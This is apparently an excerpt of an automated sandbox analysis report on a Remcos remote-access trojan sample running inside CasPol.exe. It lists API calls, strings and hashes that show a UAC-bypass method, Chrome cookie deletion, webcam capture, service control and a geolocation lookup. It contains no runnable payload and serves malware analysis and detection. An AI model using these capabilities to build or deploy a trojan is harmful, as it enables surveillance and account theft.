                                                                                                                      • Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
                                                                                                                      APIs
                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                                      • int.LIBCPMT ref: 0040FC0F
                                                                                                                        • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                        • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                      • String ID: p[G
                                                                                                                      • API String ID: 2536120697-440918510
                                                                                                                      • Opcode ID: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
                                                                                                                      • Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
                                                                                                                      • Opcode Fuzzy Hash: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
                                                                                                                      • Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
                                                                                                                      APIs
                                                                                                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                                                                                                                      • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                                                                                                                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                                                                                                                      Strings
                                                                                                                      • http://geoplugin.net/json.gp, xrefs: 0041A55E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                      • String ID: http://geoplugin.net/json.gp
                                                                                                                      • API String ID: 3121278467-91888290
                                                                                                                      • Opcode ID: d6f499ad1e8f2f32babf086a4b04f4711f6d8a57175f587e6094264b919902b7
                                                                                                                      • Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
                                                                                                                      • Opcode Fuzzy Hash: d6f499ad1e8f2f32babf086a4b04f4711f6d8a57175f587e6094264b919902b7
                                                                                                                      • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                                                                                                                      • _free.LIBCMT ref: 0044FD39
                                                                                                                        • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                        • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                      • _free.LIBCMT ref: 0044FD44
                                                                                                                      • _free.LIBCMT ref: 0044FD4F
                                                                                                                      • _free.LIBCMT ref: 0044FDA3
                                                                                                                      • _free.LIBCMT ref: 0044FDAE
                                                                                                                      • _free.LIBCMT ref: 0044FDB9
                                                                                                                      • _free.LIBCMT ref: 0044FDC4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                      • Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
                                                                                                                      • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                      • Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655
                                                                                                                      APIs
                                                                                                                      • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
                                                                                                                        • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                        • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                      • CoUninitialize.OLE32 ref: 0040688E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                      • API String ID: 3851391207-2637227304
                                                                                                                      • Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                                      • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                                      • Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                                      • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                                      APIs
                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                      • int.LIBCPMT ref: 0040FEF2
                                                                                                                        • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                        • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                      • String ID: h]G
                                                                                                                      • API String ID: 2536120697-1579725984
                                                                                                                      • Opcode ID: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
                                                                                                                      • Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
                                                                                                                      • Opcode Fuzzy Hash: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
                                                                                                                      • Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789
                                                                                                                      APIs
                                                                                                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                      • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                      Strings
                                                                                                                      • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                      • UserProfile, xrefs: 0040B2B4
                                                                                                                      • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                      • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteErrorFileLast
                                                                                                                      • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                      • API String ID: 2018770650-304995407
                                                                                                                      • Opcode ID: d66ece4a976f4d448fc3a6911c1cd710a05d5aa7b72c80177d91237d75f1b396
                                                                                                                      • Instruction ID: 57831ae66bbe87b328e3caf482cfdb9a18bfb77b2c204d956758bc207329a0f7
                                                                                                                      • Opcode Fuzzy Hash: d66ece4a976f4d448fc3a6911c1cd710a05d5aa7b72c80177d91237d75f1b396
                                                                                                                      • Instruction Fuzzy Hash: ED01A23164410557CB0477B5DD6B8AF3624ED50708F60013FF802B22E2FE3A9A0586CE
                                                                                                                      APIs
                                                                                                                      • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                                                                                                                      • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Console$AllocOutputShowWindow
                                                                                                                      • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                                      • API String ID: 2425139147-2527699604
                                                                                                                      • Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                                                                                      • Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
                                                                                                                      • Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                                                                                      • Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$BG
                                                                                                                      • API String ID: 0-3292752334
                                                                                                                      • Opcode ID: 436699010963ecd03ae3a912ac3b80d145bf64b66cbd996a99d31e723bd19539
                                                                                                                      • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                                      • Opcode Fuzzy Hash: 436699010963ecd03ae3a912ac3b80d145bf64b66cbd996a99d31e723bd19539
                                                                                                                      • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
                                                                                                                      • PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
                                                                                                                      • Sleep.KERNEL32(00002710), ref: 00419F89
                                                                                                                      • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                      • String ID: Alarm triggered$`#v
                                                                                                                      • API String ID: 614609389-3049340936
                                                                                                                      • Opcode ID: ec93029a8d426c1f2d9bf456f9acac57abdb377192e8fa82d20351f1c069c2bf
                                                                                                                      • Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
                                                                                                                      • Opcode Fuzzy Hash: ec93029a8d426c1f2d9bf456f9acac57abdb377192e8fa82d20351f1c069c2bf
                                                                                                                      • Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB
                                                                                                                      APIs
                                                                                                                      • __allrem.LIBCMT ref: 00439799
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                                                                                                                      • __allrem.LIBCMT ref: 004397CC
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                                                                                                                      • __allrem.LIBCMT ref: 00439801
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1992179935-0
                                                                                                                      • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                                      • Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
                                                                                                                      • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                                      • Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4189289331-0
                                                                                                                      • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                                                      • Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
                                                                                                                      • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                                                      • Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                                        • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prologSleep
                                                                                                                      • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                                      • API String ID: 3469354165-462540288
                                                                                                                      • Opcode ID: aa6c569e894ef081ae3a77e9f9792835c9671d76e7273c9a8ca675ac56314457
                                                                                                                      • Instruction ID: a615deab89d52a04eef9df102bd8b4982dd8b49b1eab8c4ad016fc0191aaad38
                                                                                                                      • Opcode Fuzzy Hash: aa6c569e894ef081ae3a77e9f9792835c9671d76e7273c9a8ca675ac56314457
                                                                                                                      • Instruction Fuzzy Hash: E941A330A0420196CA14FB79C816AAD3A655B45704F00413FF809A73E2EF7C9A85C7CF
                                                                                                                      APIs
                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
                                                                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
                                                                                                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 493672254-0
                                                                                                                      • Opcode ID: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                                                                                                                      • Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
                                                                                                                      • Opcode Fuzzy Hash: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                                                                                                                      • Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
                                                                                                                      • SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3852720340-0
                                                                                                                      • Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                                                                      • Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
                                                                                                                      • Opcode Fuzzy Hash: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                                                                      • Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                                      • _free.LIBCMT ref: 00446F06
                                                                                                                      • _free.LIBCMT ref: 00446F2E
                                                                                                                      • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                                                                                                                      • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                                      • _abort.LIBCMT ref: 00446F4D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3160817290-0
                                                                                                                      • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                      • Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
                                                                                                                      • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                      • Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F
                                                                                                                      APIs
                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                                                                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                                                                                                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 221034970-0
                                                                                                                      • Opcode ID: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                                                                                                                      • Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
                                                                                                                      • Opcode Fuzzy Hash: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                                                                                                                      • Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5
                                                                                                                      APIs
                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                                                                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                                                                                                                      • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 221034970-0
                                                                                                                      • Opcode ID: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                                                                                                                      • Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
                                                                                                                      • Opcode Fuzzy Hash: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                                                                                                                      • Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9
                                                                                                                      APIs
                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                                                                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                                                                                                                      • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 221034970-0
                                                                                                                      • Opcode ID: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                                                                                                                      • Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
                                                                                                                      • Opcode Fuzzy Hash: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                                                                                                                      • Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8
                                                                                                                      APIs
                                                                                                                      • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Enum$InfoQueryValue
                                                                                                                      • String ID: [regsplt]$DG
                                                                                                                      • API String ID: 3554306468-1089238109
                                                                                                                      • Opcode ID: 04be85a10a65fedb481150b8bc6c203764df31fda0f784146e603b05117797e8
                                                                                                                      • Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
                                                                                                                      • Opcode Fuzzy Hash: 04be85a10a65fedb481150b8bc6c203764df31fda0f784146e603b05117797e8
                                                                                                                      • Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                                      APIs
